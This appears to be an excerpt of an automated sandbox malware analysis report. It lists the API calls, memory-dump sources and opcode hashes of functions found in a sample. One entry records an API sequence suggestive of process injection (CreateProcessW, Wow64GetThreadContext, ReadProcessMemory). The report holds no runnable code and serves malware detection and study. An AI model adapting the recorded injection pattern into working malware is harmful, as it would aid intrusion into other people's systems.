                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 855a981e3d87b0586b227f36a287a9e63fe5cd358b5bfab8de368ff291d46a89
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7605a8ea73ac57d11bec7dd1d6207c313580f8ed20fa142c5c15d61e0266fbc2
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 67011D703803107AF2311F28AD5BF5632546B44B24F244B39FBD5BE2E2D2F86885970C
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: __lock_file_memset
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 26237723-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: c8a12bf2a45d0ac11074f8cac28b928f9e20b60047ac9024d749846706a082ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c74911371e76cb9dc4786cfdbe28690debad29cef5acae8c4501fea9e7903076
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32012971C00609FBCF22AF65DC029DF3B31AF44714F04815BF82416261D7798AA2DF99
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417F23: __getptd_noexit.LIBCMT ref: 00417F23
                                                                                                                                                                                                                                                                                                                                                                                                                  • Part of subcall function 00417EBB: __decode_pointer.LIBCMT ref: 00417EC6
                                                                                                                                                                                                                                                                                                                                                                                                                • __lock_file.LIBCMT ref: 00414EE4
• Part of subcall function 00415965: __lock.LIBCMT ref: 0041598A
• __fclose_nolock.LIBCMT ref: 00414EEE
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __decode_pointer__fclose_nolock__getptd_noexit__lock__lock_file
• String ID:
• API String ID: 717694121-0
• Opcode ID: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
• Instruction ID: 225a509e04b880138f2478077c57af59103cae2c072c29012e7845c0956b1514
• Opcode Fuzzy Hash: 6051778e024176e7de16a1974b8d1b3b80c3b8a23747dfcb666cdf4e7799d8f6
• Instruction Fuzzy Hash: DEF06270D0470499C721BB6A9802ADE7AB0AFC1338F21864FE479A72D1C77C46C29F5D
APIs
• TranslateMessage.USER32(?), ref: 004098F6
• DispatchMessageW.USER32(?), ref: 00409901
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Message$DispatchTranslate
• String ID:
• API String ID: 1706434739-0
• Opcode ID: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
• Instruction ID: 6b3a2aeb923af73eb4cdb1bab797699f2cf27729a5018e8568c19fb4e3feaf67
• Opcode Fuzzy Hash: 743ba5b075e4e96b6aa8f27e888cbbcb244a1ef3297f43ff84cf2107d4412f6a
• Instruction Fuzzy Hash: D4F05471114301AEDA24DBE58D41B5BB3A8AFD8700F408C2EBA51E61C1FBF8E404C76A
APIs
• TranslateMessage.USER32(?), ref: 004098F6
• DispatchMessageW.USER32(?), ref: 00409901
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: Message$DispatchTranslate
• String ID:
• API String ID: 1706434739-0
• Opcode ID: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
• Instruction ID: cc4909b6a78c34842ee59a7900970f574117f06624f4f9c7373c79b1fb9dfc76
• Opcode Fuzzy Hash: fb629fc6ca96518639a0c0a81923e3da878f7f29ff55e6bd70df59113b88f2fd
• Instruction Fuzzy Hash: DDF054B1114301AADA14DBE58D41B5BB3A4AF94740F408C2EBA11E52C1EBFCD504C71A
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 0538DA6B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 0538DB01
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 0538DB23
Memory Dump Source
• Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
Similarity
• API ID: Process$ContextCreateMemoryReadThreadWow64
• String ID:
• API String ID: 2438371351-0
• Opcode ID: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
• Instruction ID: 6af8220fbbe09b0ec308284c489047d5d2dd72d02bb54799f5ddac9511bdde25
• Opcode Fuzzy Hash: 45c0bcdfd50c24934144be52d4489c8f4aeee23b26077383fd0484b0fd6f3e51
• Instruction Fuzzy Hash: E612CE24E18658C6EB24DF64D8507DEB232FF68300F1094E9910DEB7A4E77A5F81CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProtectVirtual
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 544645111-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: fb1d736feddc8336b94c661b4f3a99b04f66f7614ca83ae43ac4a02a862e88ab
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1331D574A00105DFC718DF99E490AAAFBA6FB49304B2486A6E409CB751D774EDC1CBC5
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 573dba848690e0cdfd4c9be45b5663ff9194aa529e9341154cf92adfcd841cf8
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: a12857963b59ba27d86be744ec8e6ce9272b51880a9e98fb69d1fc4369ccfb77
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5E11C374200200ABC7249FAAD8D5F2A73A5AF45304B244C6FE845E7392D73CEC81EB5E
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • DefWindowProcW.USER32(?,?,?,?), ref: 00401123
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: ProcWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 181713994-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 72bdf1ad184d721e15e17473fba0dc1faec6c1a9a9d1f3fcb71c15abd8c9f185
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 2bcff8431ba1ff294e2b1c33dceaa93ee25f984dfbecb3b506615433fd530346
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FDF05436700118A7DF38995CE89ACFF632AD7ED350F418227FD152B3A6813C5C41966E
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • HeapCreate.KERNELBASE(00000000,00001000,00000000), ref: 0041AA46
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: CreateHeap
• String ID:
• API String ID: 10892065-0
• Opcode ID: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
• Instruction ID: 99ddfbee892492b32903703907324a593b21f4d4a70cf9c354be63060b8faba1
• Opcode Fuzzy Hash: 715419928b85d2867e9ba06f33a68846dd0d9c70f7b25bc38942ce62b1fa172d
• Instruction Fuzzy Hash: 56D05E325543449EDF009F71AC087663FDCE788395F008836BC1CC6150E778C950CA08
APIs
  • Part of subcall function 00444326: SetFilePointerEx.KERNEL32(00000000,00000001,00000000,00000000,00000001,?,?,0044434E,?,?,00429A83,?,00487174,00000003,0040DFEE,?), ref: 004442F3
• WriteFile.KERNELBASE(?,?,00000001,?,00000000,?,?,00429A83,?,00487174,00000003,0040DFEE,?,?,00000001,00403843), ref: 00444362
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: File$PointerWrite
• String ID:
• API String ID: 539440098-0
• Opcode ID: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
• Instruction ID: 4a339a6eb5dfef6003722c1615037f540bc53d76d7f4c43935d02bdd90bbdfc9
• Opcode Fuzzy Hash: 35769b91a3a7bdb08b20991cec1574ff36ffa6c1adc4d20a0c17b9033c9b0ad0
• Instruction Fuzzy Hash: 7CE09275104311AFD250DF54D944F9BB3F8AF88714F108D0EF59587241D7B4A9848BA6
APIs
• DefWindowProcW.USER32(?,?,?,?), ref: 00401123
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: ProcWindow
• String ID:
• API String ID: 181713994-0
• Opcode ID: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
• Instruction ID: 4c36cba44089d0e03573cc5e8dee84df23505be31ebc2729507753268ee0d302
• Opcode Fuzzy Hash: 837c1f5b160989e4bc04331483680d437582dbd9ffcfcea34caefcb6c1da81af
• Instruction Fuzzy Hash: C3C08C72100008BB8700DE04EC44CFBB72CEBD8310700C20BBC0586201C230885097A1
APIs
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
Similarity
• API ID: __wfsopen
• String ID:
• API String ID: 197181222-0
• Opcode ID: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
• Instruction ID: 6225ca515e7db1e5d7746fb8cf1e0ad45b41b4d1817cc5a1d8a93eb941133566
• Opcode Fuzzy Hash: d1a4d26266dcb7911ef956bf4afcad96e19892d5a9e8770749e386b2bd63db79
• Instruction Fuzzy Hash: EDC09B7644010C77CF122943FC02E453F1997C0764F044011FB1C1D561D577D5619589
APIs
• CloseHandle.KERNELBASE(00000000,?,0040DF8E), ref: 0040D91D
Memory Dump Source
• Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: CloseHandle
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 2962429428-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 397672216df932ca6c22f29d52987cd2165f63c791f69eb8015935d900cfb6d9
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b0db0cc9728059d6acb69f925b284233246e7185417bf28957a0aabd78f307cc
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 16E0DEB5900B019EC7318F6AE544416FBF8AEE46213248E2FD4E6D2A64D3B4A5898F54
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000001F4), ref: 0538E2C1
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2105923084.000000000538C000.00000040.00000020.00020000.00000000.sdmp, Offset: 0538C000, based on PE: false
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_538c000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-0
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: 8221d6210e3c6c1be91b1bd641982e13835dc43e92a327ef3bb88f4ff96ff1b3
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 368835ae2f5fba710e6c01549c2017e46dd928bc4d187f44ede00cceab054826
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2EE0E67494020DEFDB00EFF4D5496AE7FB4EF04301F100161FD01D2280DA309D509A62
                                                                                                                                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C158
                                                                                                                                                                                                                                                                                                                                                                                                                • DefDlgProcW.USER32(?,0000004E,?,?,004A83D8,?,004A83D8,?), ref: 0047C173
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000011), ref: 0047C1A4
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000009), ref: 0047C1AD
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000130B,00000000,00000000), ref: 0047C1C0
                                                                                                                                                                                                                                                                                                                                                                                                                • GetKeyState.USER32(00000010), ref: 0047C1CA
                                                                                                                                                                                                                                                                                                                                                                                                                • GetWindowLongW.USER32(00000002,000000F0), ref: 0047C1DE
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000110A,00000009,00000000), ref: 0047C20A
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(00000002,0000113E,00000000,?), ref: 0047C22D
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 0047C2D6
                                                                                                                                                                                                                                                                                                                                                                                                                • SendMessageW.USER32 ref: 0047C2FB
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101844737.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101883423.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_AENiBH7X1q.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                • API ID: MessageSend$State$LongProcWindow
                                                                                                                                                                                                                                                                                                                                                                                                                • String ID: @GUI_DRAGID$F
                                                                                                                                                                                                                                                                                                                                                                                                                • API String ID: 1562745308-4164748364
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode ID: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction ID: f40edf6d5039c675f00343e7880f865f139be9e64e9b8d530a61de5f06f6045f
                                                                                                                                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: dcc01cbd87ddd492c2c278cbacd50e58f25e8ccd866e9ebab9dee97b514268e5
                                                                                                                                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C6429F702042019FD714CF54C884FAB77A5EB89B04F548A6EFA48AB291DBB4EC45CB5A
                                                                                                                                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2101757388.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101736620.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2101824558.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
